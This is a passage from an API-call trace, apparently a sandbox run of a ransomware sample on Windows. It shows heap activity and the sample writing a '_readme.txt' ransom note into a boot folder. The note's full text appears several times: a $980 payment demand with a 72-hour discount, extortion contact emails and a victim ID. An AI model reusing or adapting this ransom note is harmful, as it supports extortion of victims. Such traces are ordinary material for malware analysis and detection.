dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.035] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0128.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.035] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0128.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.035] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.035] PathFindFileNameW (pszPath="") returned="" [0128.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.035] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0128.036] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0128.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0128.036] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0128.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0128.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.036] FreeLibrary (hLibModule=0x759d0000) returned 1 [0128.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x81c) returned 0xdcd2b08 [0128.036] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0128.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.036] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0128.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x7d00) returned 0xdd2c688 [0128.036] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0128.036] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0128.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd3390 [0128.036] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c4 [0128.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8c0) returned 0x7516fe8 [0128.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x85c) returned 0x49db7d8 [0128.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x49db7d8, cbMultiByte=2140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 1117 [0128.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x49dc040 [0128.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49db7d8 | out: hHeap=0x4970000) returned 1 [0128.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.037] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned 1116 [0128.037] WriteFile (in: hFile=0x5c4, lpBuffer=0x49dc040*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0xe00fb64, lpOverlapped=0x0 | out: lpBuffer=0x49dc040*, lpNumberOfBytesWritten=0xe00fb64*=0x45c, lpOverlapped=0x0) returned 1 [0128.038] CloseHandle (hObject=0x5c4) returned 1 [0128.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dc040 | out: hHeap=0x4970000) returned 1 [0128.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd3390 | out: hHeap=0x4970000) returned 1 [0128.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0128.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.038] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe38b88c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38b88c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0128.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.039] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe38b88c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38b88c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.039] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0128.039] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38b88c0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe38b88c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38b88c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0128.039] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38b88c0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe38b88c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38b88c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0128.039] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0128.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0128.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0128.039] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: 